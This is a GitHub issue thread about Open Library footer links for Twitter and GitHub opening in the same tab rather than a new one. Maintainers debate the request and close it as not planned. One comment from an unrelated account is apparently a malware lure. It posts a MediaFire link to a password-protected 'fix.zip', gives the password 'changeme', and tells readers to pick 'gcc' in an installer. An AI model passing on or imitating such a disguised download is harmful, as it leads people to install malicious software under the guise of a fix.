### ISSUE TITLE
Footer social media links (Twitter, Github) not opening in new tabs

### ISSUE THREAD

**Issue by Harshinireddy05** [internetarchive/openlibrary#9799]
### Description:
The social media links in the footer, specifically for Twitter and LinkedIn, are currently opening in the same browser tab instead of a new tab. This behavior may disrupt user experience by navigating away from our site unexpectedly.

### Current behavior:
The link opens in the same browser tab, replacing our website.

### Expected behavior:
The link should open in a new browser tab, keeping our website open in the original tab.

NOTE: I would love to work on this issue and solve it. I shall raise a PR very soon.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mekarpeles** [comment]
Can you please link to two examples of where another website opens x/twitter in a new tab?

**Comment by mekarpeles** [comment]
https://www.sfgate.com/cannabis/article/burning-man-drug-arrests-19717332.php opens in current tab for site, new tab for the article

**Comment by Freso** [comment]
I am against this. If I want to open links in a new tab, I prefer to use ctrl-click or middle-click (or even right-click (or long press on mobile) menu "open in new tab"). There are already way too many instances of sites needlessly opening new tabs or what not for links, breaking tab history, and just taking agency away from users.

**Comment by cdrini** [comment]
Yeah I'm of the same mind, and I'm having trouble finding an example of this behaviour on other sites. So closing this as not planned, but thank you for the suggestion @Harshinireddy05 !
